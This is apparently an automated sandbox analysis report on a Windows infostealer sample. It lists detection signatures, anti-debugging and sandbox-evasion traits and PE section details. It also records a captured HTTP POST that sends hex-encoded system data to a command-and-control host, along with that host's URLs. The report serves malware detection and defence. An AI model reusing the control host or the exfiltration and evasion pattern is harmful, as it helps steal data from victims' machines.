Edit tour

Windows Analysis Report
sYPORwmgwQ.exe

Overview

General Information

Sample name:	sYPORwmgwQ.exe renamed because original name is a hash value
Original sample name:	095505c3a10c05a5301b5e4c34464ac3.exe
Analysis ID:	1581587
MD5:	095505c3a10c05a5301b5e4c34464ac3
SHA1:	c9e2e01414f9cfd74e8494ff24d03b2b0f6d9606
SHA256:	1a8051de2e50150f00fcd93bbbe527f14bdc79486dfa40733cd904dd9dd0bc08
Tags:	exeuser-abuse_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Hides threads from debuggers

Infostealer behavior detected

Leaks process information

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality to create an SMB header

Detected potential crypto function

Entry point lies outside standard sections

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

sYPORwmgwQ.exe (PID: 4028 cmdline: "C:\Users\user\Desktop\sYPORwmgwQ.exe" MD5: 095505C3A10C05A5301B5E4C34464AC3)

cleanup

HTTP traffic detected: POST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1Host: home.fiveth5ht.topAccept: */*Content-Type: application/jsonContent-Length: 444129Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 32 38 34 38 38 32 34 31 39 35 37 35 35 30 31 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 30 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 33 32 20 7d 2c 2

Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17
Source: sYPORwmgwQ.exe, 00000000.00000003.2171962564.0000000001A52000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171979311.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2174310980.0000000001A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
Source: sYPORwmgwQ.exe, 00000000.00000003.2171962564.0000000001A52000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171979311.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2174310980.0000000001A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17351868626963
Source: sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS
Source: sYPORwmgwQ.exe, 00000000.00000003.2171962564.0000000001A52000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000003.2171979311.0000000001A57000.00000004.00000020.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2174310980.0000000001A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/hsts.html
Source: sYPORwmgwQ.exe	String found in binary or memory: https://curl.se/docs/hsts.html#
Source: sYPORwmgwQ.exe, sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ip
Source: sYPORwmgwQ.exe, 00000000.00000003.2082066041.00000000076B0000.00000004.00001000.00020000.00000000.sdmp, sYPORwmgwQ.exe, 00000000.00000002.2173078240.0000000000D71000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://httpbin.org/ipbefore

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

PE file contains section with special chars

Source: sYPORwmgwQ.exe	Static PE information: section name:
Source: sYPORwmgwQ.exe	Static PE information: section name: .idata
Source: sYPORwmgwQ.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AD6139	0_3_01AD6139
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AD6139	0_3_01AD6139
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AD6139	0_3_01AD6139
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AD6139	0_3_01AD6139
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AD6139	0_3_01AD6139
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ADB882	0_3_01ADB882
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AC53F9	0_3_01AC53F9
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008105B0	0_2_008105B0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00816FA0	0_2_00816FA0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008CB180	0_2_008CB180
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_0083F100	0_2_0083F100
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008D00E0	0_2_008D00E0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B8A000	0_2_00B8A000
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B8E050	0_2_00B8E050
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00866210	0_2_00866210
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008CC320	0_2_008CC320
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B54410	0_2_00B54410
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008D0420	0_2_008D0420
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_0080E620	0_2_0080E620
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B84780	0_2_00B84780
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_0086A7F0	0_2_0086A7F0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B66730	0_2_00B66730
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008CC770	0_2_008CC770
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008BC900	0_2_008BC900
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00814940	0_2_00814940
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_0080A960	0_2_0080A960
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_009D6AC0	0_2_009D6AC0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00ABAAC0	0_2_00ABAAC0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_0080CBB0	0_2_0080CBB0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B78BF0	0_2_00B78BF0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00ABAB2C	0_2_00ABAB2C
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00994B60	0_2_00994B60
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B8CC90	0_2_00B8CC90
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_009C0D80	0_2_009C0D80
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B7CD80	0_2_00B7CD80
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B84D40	0_2_00B84D40
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B1AE30	0_2_00B1AE30
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008CEF90	0_2_008CEF90
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008C8F90	0_2_008C8F90
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B52F90	0_2_00B52F90
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00824F70	0_2_00824F70
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_008110E6	0_2_008110E6
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B6D430	0_2_00B6D430
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B735B0	0_2_00B735B0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_2_00B556D0	0_2_00B556D0
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01AD5037	0_3_01AD5037

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 008450A0 appears 72 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 009DCBC0 appears 64 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 0080CAA0 appears 55 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 009B7220 appears 82 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 00844F40 appears 250 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 008071E0 appears 39 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 00845340 appears 33 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 0081CCD0 appears 45 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 00844FD0 appears 198 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 008E44A0 appears 49 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 008073F0 appears 90 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 0081CD40 appears 52 times
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: String function: 008075A0 appears 492 times

Source: sYPORwmgwQ.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: sYPORwmgwQ.exe

Static PE information: Section: sbkcwdwk ZLIB complexity 0.9943872063339046

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Code function: 0_2_0080255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_0080255D

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Code function: 0_2_008029FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,

0_2_008029FF

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Mutant created: \Sessions\1\BaseNamedObjects\My_mutex

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: sYPORwmgwQ.exe	Virustotal: Detection: 45%
Source: sYPORwmgwQ.exe	ReversingLabs: Detection: 55%

Source: sYPORwmgwQ.exe	String found in binary or memory: Unable to complete request for channel-process-startup
Source: sYPORwmgwQ.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior

Source: sYPORwmgwQ.exe

Static file information: File size 4464640 > 1048576

Source: sYPORwmgwQ.exe	Static PE information: Raw size of is bigger than: 0x100000 < 0x288a00
Source: sYPORwmgwQ.exe	Static PE information: Raw size of sbkcwdwk is bigger than: 0x100000 < 0x1b5a00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe

Unpacked PE file: 0.2.sYPORwmgwQ.exe.800000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sbkcwdwk:EW;xxoohpui:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sbkcwdwk:EW;xxoohpui:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: sYPORwmgwQ.exe

Static PE information: real checksum: 0x44d7e3 should be: 0x45196b

Source: sYPORwmgwQ.exe	Static PE information: section name:
Source: sYPORwmgwQ.exe	Static PE information: section name: .idata
Source: sYPORwmgwQ.exe	Static PE information: section name:
Source: sYPORwmgwQ.exe	Static PE information: section name: sbkcwdwk
Source: sYPORwmgwQ.exe	Static PE information: section name: xxoohpui
Source: sYPORwmgwQ.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ABF39B push eax; ret	0_3_01ABF461
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A69498 push esi; iretd	0_3_01A6A5BA
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A69498 push esi; iretd	0_3_01A6A5BA
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6A1D1 push esi; iretd	0_3_01A6A5BA
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6A1D1 push esi; iretd	0_3_01A6A5BA
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6B621 push esp; ret	0_3_01A6B622
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6B621 push esp; ret	0_3_01A6B622
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6BE21 push ebp; ret	0_3_01A6BE22
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6BE21 push ebp; ret	0_3_01A6BE22
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A64100 push eax; retf	0_3_01A64101
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01ACCECF push 8E2ED5A5h; iretd	0_3_01ACCEE3
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6BE21 push ebp; ret	0_3_01A6BE22
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6BE21 push ebp; ret	0_3_01A6BE22
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6B621 push esp; ret	0_3_01A6B622
Source: C:\Users\user\Desktop\sYPORwmgwQ.exe	Code function: 0_3_01A6B621 push esp; ret	0_3_01A6B622
